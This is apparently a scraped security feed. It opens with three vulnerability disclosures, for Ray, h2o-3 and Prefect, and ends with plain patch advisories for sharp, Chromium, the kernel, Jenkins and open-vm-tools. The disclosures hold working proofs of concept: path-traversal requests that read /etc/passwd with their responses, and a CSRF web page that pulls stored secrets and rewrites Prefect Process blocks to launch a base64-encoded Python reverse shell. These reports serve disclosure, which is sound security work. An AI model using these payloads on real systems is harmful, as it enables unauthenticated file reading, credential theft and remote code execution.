LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.

**Description**

Attackers can read any file on the system with the permissions of the user that started the Ray Dashboard.

**Proof of Concept**

    GET /api/v0/logs/file?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79&filename=../../../../../etc%2fpasswd&lines=50000 HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: text/plain
    Date: Thu, 24 Aug 2023 21:49:54 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    Content-Length: 8225
    
    1##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    

**Impact**

Allows attackers to remotely read any file on the system depending on the permissions of the user that started Ray.

**Occurrences**

CVE-2023-6021: LFI in Ray API in ray

An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.

**Description**

Local file include in h2o-3 REST API. Unauthenticated, remote, no user interaction, default installation.

**Proof of Concept**

Start the h2o-3 API with:

    cd h2o-3.40.0.4
    java -jar h2o.jar
    

Then make these curl requests:

    curl -i -s -k -X $'GET' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        $'http://127.0.0.1:54321/3/ImportFiles?path=%2Fetc%2Fpasswd'
    

    curl -i -s -k -X $'POST' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 50' -H $'Origin: http://127.0.0.1:54321' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        --data-binary $'source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D' \
        $'http://127.0.0.1:54321/3/ParseSetup'
    

The response:

    HTTP/1.1 200 OK
    Connection: close
    Date: Thu, 08 Jun 2023 15:10:27 GMT
    Cache-Control: no-cache
    X-h2o-build-project-version: 3.40.0.4
    X-h2o-rest-api-version-max: 3
    X-h2o-cluster-id: 1686167537026
    X-h2o-cluster-good: true
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; img-src 'self' data:
    Content-Type: application/json
    Content-Length: 1457
    
    {"__meta":{"schema_version":3,"schema_name":"ParseSetupV3","schema_type":"ParseSetup"},"_exclude_fields":"","source_frames":[{"__meta":{"schema_version":3,"schema_name":"FrameKeyV3","schema_type":"Key<Frame>"},"name":"nfs://etc/passwd","type":"Key<Frame>","URL":"/3/Frames/nfs://etc/passwd"}],"parse_type":"CSV","separator":32,"single_quotes":false,"check_header":-1,"column_names":null,"skipped_columns":null,"column_types":["String","Enum"],"na_strings":null,"column_name_filter":null,"column_offset":0,"column_count":0,"destination_frame":"passwd.hex","header_lines":0,"number_columns":2,"data":[["nobody:*:-2:-2:Unprivileged","User:/var/empty:/usr/bin/false"],["root:*:0:0:System","Administrator:/var/root:/bin/sh"],["daemon:*:1:1:System","Services:/var/root:/usr/bin/false"],["fakeuser:*:99:99:Fake","User:/Users/danmcinerney/fakeuser:/bin/sh"],["_uucp:*:4:4:Unix","to","Unix","Copy","Protocol:/var/spool/uucp:/usr/sbin/uucico"],["_taskgated:*:13:13:Task","Gate","Daemon:/var/empty:/usr/bin/false"],["_networkd:*:24:24:Network","Services:/var/networkd:/usr/bin/false"],["_installassistant:*:25:25:Install","Assistant:/var/empty:/usr/bin/false"],["_lp:*:26:26:Printing","Services:/var/spool/cups:/usr/bin/false"],["_postfix:*:27:27:Postfix","Mail","Server:/var/spool/postfix:/usr/bin/false"]],"warnings":null,"chunk_size":4194304,"total_filtered_column_count":2,"custom_non_data_line_markers":null,"decrypt_tool":null,"partition_by":null,"escapechar":0}
    

Developers have been contacted 06/08/2023:

    H2O Support
        
    Wed, Jun 7, 4:32 PM (18 hours ago)
        
    to me
    
    Dear Dan McInerney,
    
    We would like to acknowledge that we have received your request for support and a ticket has been created. A support representative will be reviewing your request and will send you a personal response.
    Your ticket id is :  [#105551] 
    
    
    To view the status of the ticket or add comments, please visit
    https://support.h2o.ai/helpdesk/tickets/105551
    
    Your problem description is as below:
    
    The h2o-3 API has an LFI. You can read any file on the filesystem with import and parse commands. By default the API initializes without authentication and is remotely accessible to anyone on the local network, or the world at large if the user publicly exposed the endpoint.
    
    
    
    
    
    Ticket attachments : 1. lfi id rsa.png
    2. Screenshot 2023-06-07 at 4.31.34 PM.png
    
    
    Thank you for your patience.
    
    Sincerely,
    H2O.ai Support Team
    

**Impact**

Remotely accessing every file on the API server with the permissions of the user who ran the command.

**Occurrences**

CVE-2023-6038: LFI in h2o-3 API in h2o-3

An attacker is able to steal secrets and potentially gain remote code execution via CSRF using the Prefect API.

**Description**

If you are running the dashboard locally there is no csrf/cors/no auth and therefore you are vulnerable to cross site request forgeries. Worse yet, the service is almost certainly at 127.0.0.1:4200, reducing any need for recon or brute force. CSRF/cors/lack of auth is also likely to be a issue on self hosted instances based on the lack of documentation about how to configure auth to function similar to the cloud version.

**Proof of Concept**

    <!doctype html>
    
    <html lang="en">
    
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Prefect cross site request POC</title>
        <meta name="author" content="Joshua Bonnett">
        <meta property="og:title" content="Prefect cross site request POC">
        <meta property="og:description" content="A simple poc for prefect block data extraction ">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.0/jquery.min.js"></script>
    </head>
    
    <body>
        <hr />
        <h1> Stolen Block content:</h1>
        <div class="block_content"> </div>
        <h1> Stolen Artifact content:</h1>
        <hr />
        <div class="artifacts"> </div>
        <hr />
        <h1> Stolen variable content:</h1>
        <hr />
        <div class="vars"> </div>
        <hr />
        <h1> Notes:</h1>
        Note that this wasn't sent anywhere, but it easily could have been sent with a second post to a server of my
        choosing, and it need not be on its own page, it could be in a ad, 10 iframes deep on a common watering hole site.
    
        Recommendation: actually enforce csrf header requirements, get rid of the "include_secrets" api flag.
        <script>
    
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.block_content').html(y));
    
            fetch("http://127.0.0.1:4200/api/artifacts/latest/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.artifacts').html(y));
            fetch("  http://127.0.0.1:4200/api/variables/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.vars').html(y));
    
            //***** Find process blocks and change them****//
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.json()).then(function (data) {
                data.forEach(element => {
                    if (element.block_type.name == "Process") {
                        fetch("http://127.0.0.1:4200/api/block_documents/" + element.id, {
                            "headers": {
                                "accept": "application/json, text/plain, */*",
                                "accept-language": "en-US,en;q=0.9",
                                "cache-control": "no-cache",
                                "content-type": "application/json",
                                "pragma": "no-cache",
                                "sec-ch-ua-mobile": "?0",
                                "sec-ch-ua-platform": "\"Linux\"",
                                "sec-fetch-dest": "empty",
                                "sec-fetch-mode": "cors",
                                "sec-fetch-site": "same-origin",
                                "sec-gpc": "1",
                                "x-prefect-ui": "true"
                            },
                            "referrer": "http://127.0.0.1:4200/blocks/block/e3129574-2094-4411-a685-5c327a0201df/edit",
                            "body": "{\"data\":{\"command\":[\"python\", \"-c\", \"import base64,sys;exec(base64.b64decode(sys.argv[1]))\", \"aW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMTI3LjAuMC4xIiw5MDAxKSk7W29zLmR1cDIocy5maWxlbm8oKSxmKWZvciBmIGluKDAsMSwyKV07cHR5LnNwYXduKCJzaCIp\"], \"stream_output\":true}, \"merge_existing_data\":false}",
                            "method": "PATCH"
                        });
                    }
                });
            });
        </script>
    </body>
    
    </html>
    

**Impact**

Stealing or changing secrets from blocks(example: aws creds, azur cred blocks) Stealing or changing variables inputs from blocks/variables(example: remote file block,) Stealing any output data from artifacts(Example: output from ml runs)

Reverse shell is possible by changing any existing Process blocks to a reverse shell (set to localhost port 9001 in the Poc, but I could have it connect back over the internet), triggers when a flow that uses that block runs. I could add code to trigger a quick run on all flows to ensure connect back shell happens immediately but I leave that to the reader.

A very similar effect could happen within the docker container, Azure Container Instance Job, ECS Task, GCP Cloud Run Job and Kubernetes Job blocks if they are configured. I didn't include them in the poc because of the complexity of setting them up in my dev env, but adapting the poc to each of these block types would be very simple.

I would recommend moving the configuration of those block types into flow code where it isnt updateable from the web, and it can be managed like code.

**Occurrences**

server.py L560

It is worth setting some limits in cors by default, it is a shame to have the middleware but have it wide open.

block\_documents.py L80

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

block\_documents.py L52

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

CVE-2023-6022: Can use csrf to steal/modify block content, artifact content, variables possibly leading to RCE when the dashboard is running on a developers workstation in prefect

## Overview

sharp uses libwebp to decode WebP images and versions prior to the latest 0.32.6 are vulnerable to the high severity https://github.com/advisories/GHSA-j7hp-h8jx-5ppr.

## Who does this affect?

Almost anyone processing untrusted input with versions of sharp prior to 0.32.6.

## How to resolve this?

### Using prebuilt binaries provided by sharp?

Most people rely on the prebuilt binaries provided by sharp.

Please upgrade sharp to the latest 0.32.6, which provides libwebp 1.3.2.

### Using a globally-installed libvips?

Please ensure you are using the latest libwebp 1.3.2.

## Possible workaround

Add the following to your code to prevent sharp from decoding WebP images.
```js
sharp.block({ operation: ["VipsForeignLoadWebp"] });
```

**Overview**

sharp uses libwebp to decode WebP images and versions prior to the latest 0.32.6 are vulnerable to the high severity GHSA-j7hp-h8jx-5ppr.

**Who does this affect?**

Almost anyone processing untrusted input with versions of sharp prior to 0.32.6.

**How to resolve this?****Using prebuilt binaries provided by sharp?**

Most people rely on the prebuilt binaries provided by sharp.

Please upgrade sharp to the latest 0.32.6, which provides libwebp 1.3.2.

**Using a globally-installed libvips?**

Please ensure you are using the latest libwebp 1.3.2.

**Possible workaround**

Add the following to your code to prevent sharp from decoding WebP images.

sharp.block({ operation: \["VipsForeignLoadWebp"\] });

**References**

*   GHSA-54xq-cgqr-rpm3
*   lovell/sharp@dbce6fa

GHSA-54xq-cgqr-rpm3: sharp vulnerability in libwebp dependency CVE-2023-4863

Debian Linux Security Advisory 5556-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5556-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonNovember 15, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-5997 CVE-2023-6112Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 119.0.6045.159-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 119.0.6045.159-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmVVT/UACgkQZF0CR8NudjfQZw//bJoI/QaSlCksKVM/OBj1flTAddPBNLyLxnxhIgRFk8hAWKXZfncSMt7PRfnkbzEHMxWjPmCFf3G1MnpHxI8TEMD9Ry8mmTQ/ZwZd04JYUQ6bGHKmCh6EwT/ipFpw76Xaym/CfCsrSVa+z7VclQ+S8KumbGknuJN87H0SyxwaP2khP/T/c9v1IY2qq5tJLYOAKMN+Sadex9U3+kjHScx3bBBD8OJ/PGV16X+NxctQ0bdQPVfTlXbmkiQhMnp8c4bxkgNNFV0W1AlYzUWPcIyDgJjcuR0lowEUGkT0awq23HavlA50abiUYDVP15RBkY75c0eyB4/UgP71UjUHvm23ztcaozNl0/YIUVvqMF47toydCEkrUzv6jRBCQVkAeMd3y1CQMYu/CF0U7uwrElelAVxVo0Al24G1fbjAdS5xTHe8TOJg1s5e0uts38kUzT0ESj8a0D3swjnt8AHkrJQN6bN4x9PinZPTQN9gLKdbw9vDaWOhAx3VWdfl2Pscscu+18B3GbCWtZE904rPyb6vRrHYTtCHMSzxPCrvKVSjoI28zawXhJY+eDY6Tepm6ewP2AG3oRc9/8RhBDaEnUAz+Dd4GyTTv260a2N5xnZyfuiIRv/DR0M1jhzTuJQokpfxzXQwxvgS9oMwW9WAZWJWfug7nPKuSruHbLzKlHheqKI==eZ05-----END PGP SIGNATURE-----

Debian Security Advisory 5556-1

Red Hat Security Advisory 2023-7294-01 - An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7294.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel security updateAdvisory ID:        RHSA-2023:7294-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7294Issue date:         2023-11-15Revision:           01CVE Names:          CVE-2023-3609====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)* kernel: net/sched: cls_fw component can be exploited as result of failure in tcf_change_indev function (CVE-2023-3776)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3609References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2225097https://bugzilla.redhat.com/show_bug.cgi?id=2225201

Red Hat Security Advisory 2023-7294-01

Red Hat Security Advisory 2023-7288-01 - An update for Openshift Jenkins is now available for Red Hat Product OCP Tools 4.14. Issues addressed include bypass, code execution, cross site scripting, and denial of service vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7288.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Product OCP Tools 4.14 Openshift Jenkins security update  
Advisory ID:        RHSA-2023:7288-01  
Product:            OpenShift Developer Tools and Services  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7288  
Issue date:         2023-11-16  
Revision:           01  
CVE Names:          CVE-2022-25857  
====================================================================

Summary: 

An update for Openshift Jenkins is now available for Red Hat Product OCP Tools 4.14. 

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

* snakeyaml: Denial of Service due to missing nested depth limitation for collections (CVE-2022-25857)

* maven-shared-utils: Command injection via Commandline class (CVE-2022-29599)

* apache-commons-text: variable interpolation RCE (CVE-2022-42889)

* jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin (CVE-2023-24422)

* jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin (CVE-2023-25761)

* jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin (CVE-2023-25762)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-25857

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2066479  
https://bugzilla.redhat.com/show_bug.cgi?id=2126789  
https://bugzilla.redhat.com/show_bug.cgi?id=2135435  
https://bugzilla.redhat.com/show_bug.cgi?id=2164278  
https://bugzilla.redhat.com/show_bug.cgi?id=2170039  
https://bugzilla.redhat.com/show_bug.cgi?id=2170041  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296

Red Hat Security Advisory 2023-7288-01

Red Hat Security Advisory 2023-7279-01 - An update for open-vm-tools is now available for Red Hat Enterprise Linux 7. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7279.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: open-vm-tools security updateAdvisory ID:        RHSA-2023:7279-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7279Issue date:         2023-11-15Revision:           01CVE Names:          CVE-2023-34058====================================================================Summary: An update for open-vm-tools is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines.Security Fix(es):* open-vm-tools: SAML token signature bypass (CVE-2023-34058)* open-vm-tools: file descriptor hijack vulnerability in the vmware-user-suid-wrapper (CVE-2023-34059)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-34058References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2246080https://bugzilla.redhat.com/show_bug.cgi?id=2246096

Red Hat Security Advisory 2023-7279-01

Red Hat Security Advisory 2023-7277-01 - An update for open-vm-tools is now available for Red Hat Enterprise Linux 9. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7277.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: open-vm-tools security updateAdvisory ID:        RHSA-2023:7277-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7277Issue date:         2023-11-15Revision:           01CVE Names:          CVE-2023-34058====================================================================Summary: An update for open-vm-tools is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines.Security Fix(es):* open-vm-tools: SAML token signature bypass (CVE-2023-34058)* open-vm-tools: file descriptor hijack vulnerability in the vmware-user-suid-wrapper (CVE-2023-34059)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-34058References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2246080https://bugzilla.redhat.com/show_bug.cgi?id=2246096

Red Hat Security Advisory 2023-7277-01

Red Hat Security Advisory 2023-7276-01 - An update for open-vm-tools is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7276.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: open-vm-tools security updateAdvisory ID:        RHSA-2023:7276-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7276Issue date:         2023-11-15Revision:           01CVE Names:          CVE-2023-34058====================================================================Summary: An update for open-vm-tools is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines.Security Fix(es):* open-vm-tools: SAML token signature bypass (CVE-2023-34058)* open-vm-tools: file descriptor hijack vulnerability in the vmware-user-suid-wrapper (CVE-2023-34059)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-34058References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2246080https://bugzilla.redhat.com/show_bug.cgi?id=2246096

Tag

#js